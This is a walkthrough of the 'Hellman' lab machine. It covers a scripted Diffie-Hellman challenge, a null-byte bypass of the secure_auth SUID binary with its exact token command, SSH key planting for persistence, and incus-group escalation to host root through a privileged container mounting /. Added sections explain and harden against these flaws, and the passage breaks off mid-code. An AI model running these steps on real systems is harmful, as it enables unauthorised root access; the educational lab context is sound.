Vulnyx-Hellman



Target IP: 192.168.56.253

Difficulty: Medium

Topics covered:

Automating the Diffie-Hellman key exchange

  • Core idea: use the Python pwntools library to drive the interaction fully automatically and solve the time-limited challenge of 500 consecutive key computations.

Logic flaw in a SUID binary and null-byte truncation

  • Core idea: exploit a property of C string handling (truncation at \x00) to get past the memcmp comparison, and use the reversibility of XOR to construct the required payload.

Privilege escalation through the Incus (LXD fork) container group

  • Core idea: membership in the incus group allows talking to the system-level daemon; creating a "privileged" container and mounting the host's root directory into it legitimately crosses the filesystem isolation boundary and takes an ordinary user to root on the host.

Port scan

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.253
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.253:22
Open 192.168.56.253:80
Open 192.168.56.253:1337
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 04:02 -0500
Initiating ARP Ping Scan at 04:02
Scanning 192.168.56.253 [1 port]
Completed ARP Ping Scan at 04:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:02
Completed Parallel DNS resolution of 1 host. at 04:02, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:02
Scanning 192.168.56.253 [3 ports]
Discovered open port 80/tcp on 192.168.56.253
Discovered open port 22/tcp on 192.168.56.253
Discovered open port 1337/tcp on 192.168.56.253
Completed SYN Stealth Scan at 04:02, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.56.253
Host is up, received arp-response (0.0021s latency).
Scanned at 2026-02-04 04:02:59 EST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
1337/tcp open waste syn-ack ttl 63
MAC Address: 08:00:27:06:F7:27 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.72 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Service detection

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.253 -- sV -sC -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.253:22
Open 192.168.56.253:80
Open 192.168.56.253:1337
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} sV -sC -A" on ip 192.168.56.253
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 04:03 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:03
Completed NSE at 04:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:03
Completed NSE at 04:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:03
Completed NSE at 04:03, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:03
Completed Parallel DNS resolution of 1 host. at 04:03, 1.00s elapsed
Initiating System DNS resolution of 1 host. at 04:03
Completed System DNS resolution of 1 host. at 04:04, 15.28s elapsed
DNS resolution of 2 IPs took 16.28s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating ARP Ping Scan at 04:04
Scanning 192.168.56.253 [1 port]
Completed ARP Ping Scan at 04:04, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:04
Completed Parallel DNS resolution of 1 host. at 04:04, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:04
Scanning 192.168.56.253 [3 ports]
Discovered open port 22/tcp on 192.168.56.253
Discovered open port 80/tcp on 192.168.56.253
Discovered open port 1337/tcp on 192.168.56.253
Completed SYN Stealth Scan at 04:04, 0.03s elapsed (3 total ports)
Initiating Service scan at 04:04
Scanning 3 services on 192.168.56.253
Completed Service scan at 04:05, 90.77s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.253
NSE: Script scanning 192.168.56.253.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 1.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 1.57s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
Nmap scan report for 192.168.56.253
Host is up, received arp-response (0.0020s latency).
Scanned at 2026-02-04 04:04:07 EST for 95s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0 (protocol 2.0)
80/tcp open http syn-ack ttl 64 nginx
|_http-title: Diffie-Hellman Challenge Guide
| http-methods:
|_ Supported Methods: GET HEAD
1337/tcp open waste? syn-ack ttl 63
| fingerprint-strings:
| GenericLines, NULL:
| Alice has sent you her public key.
| You've also been given your private key.
| calculate your shared secret.
| 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
| 12155994938422981215964509590666713297427949124149261214435542990394096795844
| 123776771942298527222569669816194067521883401233253810775718084513927975219327780026067469888875902774158600210623087177201052421451507940145394749236155149738619538974513396792274687207204723242778525640987194511132794070659543
| GetRequest:
| Alice has sent you her public key.
| You've also been given your private key.
| calculate your shared secret.
| 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
| 4861644867584153036535754867400945165463126657175747225284300114412308757650
|_ 3464811914238268294551333137608802397229188516332387144976948469468724626392301995945427763016449746111506513842399019494083534309357436608653860382238334274527954079275319993376542861223554104327418018580217547322346673868874132
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.98%I=7%D=2/4%Time=69830B8D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,472,"Alice\x20has\x20sent\x20you\x20her\x20public\x20key\.\nYou've\x2
SF:0also\x20been\x20given\x20your\x20private\x20key\.\nNow\x20calculate\x2
SF:0your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20=\x2024103124269210325
SF:88552076022197566074856950548502459942654116941958108831682612228890093
SF:85826134161467322714147790401219650364895705058263194273070680500922306
SF:27347453410734066962460145893616597740410271692494532003787294341703258
SF:43778659198143763193776859869524088940195577346119843545301547043747207
SF:74996976375008430892633929555996888245787241299381012913029459299994792
SF:63652640592846472097303849472116814344647144384885209401274598442888593
SF:36526896320919633919\n\nb\x20=\x201215599493842298121596450959066671329
SF:7427949124149261214435542990394096795844\nA\x20=\x201237767719422985272
SF:22569669816194067521883401233253810775718084513927975219327780026067469
SF:88887590277415860021062308717720105242145150794014539474923615514973861
SF:9538974513396792274687207204723242778525640987194511132794070659543")%r
SF:(GenericLines,481,"Alice\x20has\x20sent\x20you\x20her\x20public\x20key\
SF:.\nYou've\x20also\x20been\x20given\x20your\x20private\x20key\.\nNow\x20
SF:calculate\x20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20=\x2024103
SF:12426921032588552076022197566074856950548502459942654116941958108831682
SF:61222889009385826134161467322714147790401219650364895705058263194273070
SF:68050092230627347453410734066962460145893616597740410271692494532003787
SF:29434170325843778659198143763193776859869524088940195577346119843545301
SF:54704374720774996976375008430892633929555996888245787241299381012913029
SF:45929999479263652640592846472097303849472116814344647144384885209401274
SF:59844288859336526896320919633919\n\nb\x20=\x201215599493842298121596450
SF:9590666713297427949124149261214435542990394096795844\nA\x20=\x201237767
SF:71942298527222569669816194067521883401233253810775718084513927975219327
SF:78002606746988887590277415860021062308717720105242145150794014539474923
SF:61551497386195389745133967922746872072047232427785256409871945111327940
SF:70659543")%r(GetRequest,480,"Alice\x20has\x20sent\x20you\x20her\x20publ
SF:ic\x20key\.\nYou've\x20also\x20been\x20given\x20your\x20private\x20key\
SF:.\nNow\x20calculate\x20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20
SF:=\x20241031242692103258855207602219756607485695054850245994265411694195
SF:81088316826122288900938582613416146732271414779040121965036489570505826
SF:31942730706805009223062734745341073406696246014589361659774041027169249
SF:45320037872943417032584377865919814376319377685986952408894019557734611
SF:98435453015470437472077499697637500843089263392955599688824578724129938
SF:10129130294592999947926365264059284647209730384947211681434464714438488
SF:520940127459844288859336526896320919633919\n\nb\x20=\x20486164486758415
SF:3036535754867400945165463126657175747225284300114412308757650\nA\x20=\x
SF:20346481191423826829455133313760880239722918851633238714497694846946872
SF:46263923019959454277630164497461115065138423990194940835343093574366086
SF:53860382238334274527954079275319993376542861223554104327418018580217547
SF:322346673868874132");
MAC Address: 08:00:27:06:F7:27 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=2/4%OT=22%CT=%CU=43498%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69830BE6%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=108%TI=Z%CI=Z%TS=A)O
OS:PS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4S
OS:T11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Uptime guess: 17.056 days (since Sun Jan 18 02:44:33 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 2.02 ms 192.168.56.253

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.98 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

Visiting port 80 shows a Diffie-Hellman key exchange challenge.

Connection: nc hellman.nyx 1337

Write a script to solve it automatically.

The security of Diffie-Hellman (DH) rests on the hardness of the discrete logarithm problem. In this challenge, however, the server plays the role of a "middleman" or "verifier" and hands out the private key $b$, the public key $A$ and the modulus $p$ directly. The problem is therefore no longer a cryptographic break but an engineering one: the difficulty lies in the time limit and in answering many rounds in succession. Computing by hand cannot meet the timeout, so a script has to hold one socket connection open, compute the big-number result $S = A^b \pmod p$ in milliseconds with Python's built-in pow(base, exp, mod), and send it back.
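The round-solving logic described above, as an added example (not the write-up's script): it parses one round in the same "name = number" format the nmap banner on port 1337 shows, validates the peer's public value before use, computes $S = A^b \bmod p$, and runs both sides of a toy exchange to show the two parties agree. The message text and the numbers in it are constructed, toy-sized values, not the challenge's real parameters.

```python
import re
import secrets

# Constructed sample round in the format the banner on port 1337 shows
# (toy-sized numbers; the real challenge uses a roughly 2000-bit p).
SAMPLE_ROUND = """Alice has sent you her public key.
You've also been given your private key.
Now calculate your shared secret.

g = 2
p = 2147483647
b = 123456
A = 1000000007
> """

PARAM_NAMES = ("g", "p", "b", "A")


def parse_params(text):
    """Extract 'name = number' lines into a dict of ints (only the names present)."""
    params = {}
    for name in PARAM_NAMES:
        m = re.search(rf"^{name}\s*=\s*(\d+)\s*$", text, re.MULTILINE)
        if m:
            params[name] = int(m.group(1))
    return params


def validate_public_key(A, p):
    """Reject degenerate peer values: A in {0, 1, p-1} forces the shared secret
    into {0, 1, p-1} whatever b is, so a peer sending them learns the secret."""
    if not 2 <= A <= p - 2:
        raise ValueError(f"public key {A} not in [2, p-2]")


def shared_secret(A, b, p):
    """S = A^b mod p; pow() with three arguments does modular exponentiation
    without ever materialising the full power."""
    validate_public_key(A, p)
    return pow(A, b, p)


def solve_round(text):
    """One challenge round: parse, check, compute. Raises if a parameter is missing."""
    params = parse_params(text)
    missing = {"p", "b", "A"} - params.keys()
    if missing:
        raise ValueError(f"round text is missing {sorted(missing)}")
    return shared_secret(params["A"], params["b"], params["p"])


def simulate_exchange(g, p, a=None, b=None):
    """Both sides of a DH exchange: each side needs only the other's public value.
    Returns (A, B, S) after checking that both sides derive the same S."""
    a = secrets.randbelow(p - 3) + 2 if a is None else a
    b = secrets.randbelow(p - 3) + 2 if b is None else b
    A, B = pow(g, a, p), pow(g, b, p)
    s_alice, s_bob = shared_secret(B, a, p), shared_secret(A, b, p)
    if s_alice != s_bob:
        raise AssertionError("the two sides derived different secrets")
    return A, B, s_bob


if __name__ == "__main__":
    print("parsed:", parse_params(SAMPLE_ROUND))
    print("S for the sample round:", solve_round(SAMPLE_ROUND))
    print("toy exchange (A, B, S):", simulate_exchange(2, 2147483647))
```

In a real deployment each party generates its own private exponent locally and never receives it from the peer; the server handing out b is what turns this round into a pure computation. The range check on A is the one piece the write-up's script does not do, and it is the check a production DH implementation must have.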

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat exp.py
from pwn import *
import re

# Connection settings
HOST = '192.168.56.253'
PORT = 1337

# Open the connection
io = remote(HOST, PORT)

# The challenge requires 500 consecutive rounds
TOTAL_ROUNDS = 500

# Holds p, which may stay the same across rounds
current_p = None

print(f"[*] Starting {TOTAL_ROUNDS} rounds of Diffie-Hellman exchange...")

for i in range(TOTAL_ROUNDS):
    try:
        # 1. Receive data up to the input prompt '>'
        # decode() turns the bytes into a string for the regex matches
        data = io.recvuntil(b'>').decode()

        # 2. Extract the variables with regular expressions
        # The format is always "var = number"

        # Extract p (the modulus)
        p_match = re.search(r'p\s*=\s*(\d+)', data)
        if p_match:
            current_p = int(p_match.group(1))

        # Extract A (Alice's public key)
        A_match = re.search(r'A\s*=\s*(\d+)', data)
        current_A = int(A_match.group(1)) if A_match else None

        # Extract b (our private key)
        b_match = re.search(r'b\s*=\s*(\d+)', data)
        current_b = int(b_match.group(1)) if b_match else None

        # 3. Compute the shared secret
        # Formula: S = A^b mod p
        # Python's pow(base, exp, mod) handles big integers efficiently
        if current_p and current_A and current_b:
            shared_secret = pow(current_A, current_b, current_p)

            # 4. Send the result
            io.sendline(str(shared_secret).encode())

            # Print progress (optional; every 10 rounds so the terminal is not flooded)
            if (i + 1) % 10 == 0:
                print(f"[+] Round {i+1}/{TOTAL_ROUNDS} completed.")
        else:
            print(f"[!] Error in round {i+1}: Missing parameters.")
            print("Data received:\n", data)
            break

    except EOFError:
        print("[!] Server closed connection.")
        break
    except Exception as e:
        print(f"[!] Exception: {e}")
        break

# 5. Interactive mode
# After the loop, switch to interactive() to see any flag output
print("[*] Challenge finished. Switching to interactive mode...")
io.interactive()

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py
[+] Opening connection to 192.168.56.253 on port 1337: Done
[*] Starting 500 rounds of Diffie-Hellman exchange...
[+] Round 10/500 completed.
[+] Round 20/500 completed.
[+] Round 30/500 completed.
[+] Round 40/500 completed.
[+] Round 50/500 completed.
[+] Round 60/500 completed.
[+] Round 70/500 completed.
[+] Round 80/500 completed.
[+] Round 90/500 completed.
[+] Round 100/500 completed.
[+] Round 110/500 completed.
[+] Round 120/500 completed.
[+] Round 130/500 completed.
[+] Round 140/500 completed.
[+] Round 150/500 completed.
[+] Round 160/500 completed.
[+] Round 170/500 completed.
[+] Round 180/500 completed.
[+] Round 190/500 completed.
[+] Round 200/500 completed.
[+] Round 210/500 completed.
[+] Round 220/500 completed.
[+] Round 230/500 completed.
[+] Round 240/500 completed.
[+] Round 250/500 completed.
[+] Round 260/500 completed.
[+] Round 270/500 completed.
[+] Round 280/500 completed.
[+] Round 290/500 completed.
[+] Round 300/500 completed.
[+] Round 310/500 completed.
[+] Round 320/500 completed.
[+] Round 330/500 completed.
[+] Round 340/500 completed.
[+] Round 350/500 completed.
[+] Round 360/500 completed.
[+] Round 370/500 completed.
[+] Round 380/500 completed.
[+] Round 390/500 completed.
[+] Round 400/500 completed.
[+] Round 410/500 completed.
[+] Round 420/500 completed.
[+] Round 430/500 completed.
[+] Round 440/500 completed.
[+] Round 450/500 completed.
[+] Round 460/500 completed.
[+] Round 470/500 completed.
[+] Round 480/500 completed.
[+] Round 490/500 completed.
[+] Round 500/500 completed.
[*] Challenge finished. Switching to interactive mode...
[*] Switching to interactive mode
Correct!

Congrats! Here's the flag: 676f643a6e756d626572735f6172655f68617264
[*] Got EOF while reading in interactive
$ id
$
[*] Interrupted
[*] Closed connection to 192.168.56.253 port 1337

This yields 676f643a6e756d626572735f6172655f68617264

Decode the hex with CyberChef.

Logging in as god succeeds.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh god@192.168.56.253
god@192.168.56.253's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Hellman:~$ ls
user.txt
Hellman:~$ cat user.txt
/\_____/\
/ o o \
( == ^ == )
) (
( )
( ( ) ( ) )
(__(__)___(__)__)

c9461249ea2e074a338b82db919b3fb9
Hellman:~$ sudo -l
-sh: sudo: not found
Hellman:~$ ls /
bin dev home lost+found mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
Hellman:~$ ls /opt
containerd dh-chal
Hellman:~$ id
uid=1001(god) gid=1001(god) groups=1001(god)
Hellman:~$ ls /home
god water
Hellman:~$ find / -perm -4000 2>/dev/null
/bin/bbsuid
/usr/libexec/dbus-daemon-launch-helper
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/secure_auth
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn

Looking through the SUID files, an unusual name stands out: secure_auth. Pull it off the box and reverse it.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v4; // rdx
  char *s; // [rsp+10h] [rbp-120h]
  const char *s1; // [rsp+18h] [rbp-118h]
  char s2[264]; // [rsp+20h] [rbp-110h] BYREF
  unsigned __int64 v8; // [rsp+128h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  if ( argc > 2 )
  {
    s = (char *)argv[1];
    s1 = argv[2];
    xor_cipher(s, key, s2);
    v4 = strlen(s);
    if ( !memcmp(s1, s2, v4) )
    {
      puts("[+] Auth successful. Switching to UID 1002...");
      if ( setresgid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresgid failed");
      if ( setresuid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresuid failed");
      system(s);
    }
    else
    {
      puts("[-] Auth failed.");
    }
    return 0;
  }
  else
  {
    printf("Usage: %s <command> <token>\n", *argv);
    return 1;
  }
}

Set a breakpoint in gdb and debug the binary dynamically to obtain the token.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# gdb ./secure_auth
GNU gdb (Debian 17.1-1) 17.1
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./secure_auth...
(gdb) break memcmp
Breakpoint 1 at 0x1070
(gdb) run /bin/sh AAAAA
Starting program: /home/kali/Desktop/secure_auth /bin/sh AAAAA

Breakpoint 1, 0x00007ffff7f7e8a0 in memcmp () from /lib/ld-musl-x86_64.so.1
(gdb) x/s $rsi
0x7fffffffe020: "\033"
(gdb) x/8xb $rsi
0x7fffffffe020: 0x1b 0x00 0x59 0x59 0x18 0x42 0x5b 0x00
(gdb) run //bin/sh AAAAAAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/Desktop/secure_auth //bin/sh AAAAAAAA

Breakpoint 1, 0x00007ffff7f7e8a0 in memcmp () from /lib/ld-musl-x86_64.so.1
(gdb) x/10xb $rsi
0x7fffffffe020: 0x1b 0x4d 0x52 0x5e 0x59 0x1e 0x40 0x58
0x7fffffffe028: 0x00 0x13
(gdb)

Note that /bin/sh cannot be used here, because it runs into the null-byte truncation problem.

Deeper explanation: 1. Null-byte truncation (off-by-one / logic flaw): C string functions (strlen, printf, strcmp and the like) all treat \x00 as the terminator, while execve passes the arguments through as raw bytes. When the XOR result contains a \x00 byte, the token passed as a command-line argument is cut off at that byte, so memcmp compares too few bytes and the check cannot succeed.

2. Command mutation: using //bin/sh instead of /bin/sh changes the plaintext that goes into the XOR (the ASCII code of / is 0x2f, that of b is 0x62), which "shifts" the computed ciphertext and removes the \x00 byte from the result. At the same time, Linux path resolution ignores the redundant /, so the command still runs normally.
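The two mechanisms above, as an added example that is not part of the write-up: the key bytes are recovered from the two plaintext/ciphertext pairs the gdb session shows (XOR reversibility), the argv NUL problem is checked explicitly, and a Python model of the decompiled memcmp check is placed beside a hardened version. The byte strings are copied from the gdb output; the hardened_check function and its hex-encoded token format are this example's own design, not anything the binary implements.

```python
import hmac

# Constructed from the two gdb observations: the buffer memcmp() compares the
# token against, for the two argv[1] values tried in the write-up.
OBSERVED = {
    b"/bin/sh":  bytes.fromhex("1b 00 59 59 18 42 5b"),
    b"//bin/sh": bytes.fromhex("1b 4d 52 5e 59 1e 40 58"),
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))


def recover_key(plaintext: bytes, ciphertext: bytes) -> bytes:
    """XOR is its own inverse: plaintext ^ ciphertext gives back the key bytes."""
    return xor_bytes(plaintext[: len(ciphertext)], ciphertext)


def argv_representable(token: bytes) -> bool:
    """execve() argv entries are NUL-terminated C strings, so a \\x00 cannot be carried."""
    return b"\x00" not in token


def vulnerable_check(command: bytes, token: bytes, key: bytes) -> bool:
    """Model of the decompiled check: memcmp(token, xor(command, key), strlen(command)).

    Everything after a \\x00 in the token is invisible to the program (argv
    truncation), and memcmp looks at strlen(command) bytes only, so a longer
    token with the right prefix passes too: a prefix match, not equality.
    """
    token = token.split(b"\x00", 1)[0]
    expected = xor_bytes(command, key)
    n = len(command)
    if len(token) < n:
        # memcmp would read past the terminator here (undefined behaviour);
        # model it as a failed comparison.
        return False
    return token[:n] == expected[:n]


def hardened_check(command: bytes, token_hex: str, key: bytes) -> bool:
    """Hex-encode the expected value so it is always argv-safe (never contains
    \\x00) and compare the whole string in constant time; any length mismatch
    fails without leaking how long the correct prefix was."""
    expected = xor_bytes(command, key).hex()
    return hmac.compare_digest(expected, token_hex)


if __name__ == "__main__":
    key = recover_key(b"//bin/sh", OBSERVED[b"//bin/sh"])
    for cmd in OBSERVED:
        ct = xor_bytes(cmd, key)
        print(cmd, "->", ct.hex(), "argv-safe:", argv_representable(ct))
```

The hardened version fixes the truncation and prefix-match problems only. A token derived from the command with a static XOR key stays recoverable from a single known pair, which is exactly what recover_key demonstrates; a real authorisation check needs a secret the caller cannot derive.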

With the token in hand, just run the program.

Hellman:~$ /usr/bin/secure_auth //bin/sh $(printf "\x1b\x4d\x52\x5e\x59\x1e\x40\x58")
[+] Auth successful. Switching to UID 1002...
~ $ id
uid=1002(water) gid=1002(water) groups=1001(god)

Upload linpeas for further analysis.

uid=1002(water) gid=1002(water) groups=1002(water),106(incus)

water is in the incus group.

Check the incus group's members.

/home/water $ grep incus /etc/group
incus:x:106:water
incus-user:x:107:
incus-admin:x:108:
/home/water $  ls -l /var/lib/incus/unix.socket
srw-rw---- 1 root incus 0 Feb 4 16:58 /var/lib/incus/unix.socket
/home/water $

incus cannot be used from this shell yet, so drop an SSH public key and log in as water.

/home/water $ mkdir .ssh
/home/water $ cd .ssh/
/home/water/.ssh $ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
/home/water/.ssh $

┌──(root㉿kaada)-[~/.ssh]
└─# ssh water@192.168.56.253
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Hellman:~$ id
uid=1002(water) gid=1002(water) groups=106(incus),1002(water)
Hellman:~$

List the local images

Hellman:~$ incus image list
To start your first container, try: incus launch images:fedora/42
Or for a virtual machine: incus launch images:fedora/42 --vm

+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
Hellman:~$

We need to build an image ourselves.

1. The daemon's god's-eye view: the Incus (and LXD) daemon runs as root on the host. Any user in the incus group can talk to this root daemon over its Unix socket. Holding incus group membership is therefore equivalent to holding root; it only takes one "conversion" step.

2. Privileged container: by default a container is "unprivileged": root inside the container (UID 0) is mapped to an ordinary user on the host (e.g. UID 100000) by the user namespace isolation mechanism. Setting -c security.privileged=true explicitly switches this isolation off, so root inside the container (UID 0) corresponds directly to root on the host (UID 0).

3. Cross-boundary filesystem mount: incus config device add ... source=/ path=/mnt/root tells the daemon to mount the host's physical root directory inside the container. Combined with point 2, since we are real root inside the container and now have a complete view of the host's filesystem, we can edit the host's /etc/shadow or /root/.ssh/authorized_keys like any ordinary file and take over the host completely.

Summary: this is not a vulnerability but configuration abuse. It exploits the "flexibility" the container manager offers by design (allowing physical disks to be mounted) together with improper privilege assignment (putting an untrusted user into the management group).
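Since the write-up frames this as configuration abuse, the defender-side check is an audit of the two things that combine here: membership in the daemon's group (the /etc/group output above) and container definitions that are privileged or mount sensitive host paths (points 2 and 3). The following is an added example, not part of the write-up or of Incus itself. The container definitions are constructed Python dicts in the shape of `incus config show` output (the config/devices/type/source/path key names are an assumption about that format); the /etc/group sample copies the lines the write-up shows plus a constructed wheel line.

```python
# Constructed container definitions in the shape of `incus config show <name>`
# (assumed key names), mirroring the container the write-up builds and a benign one.
PWN_CONTAINER = {
    "name": "pwn",
    "config": {"security.privileged": "true"},
    "devices": {
        "host-root": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"},
    },
}

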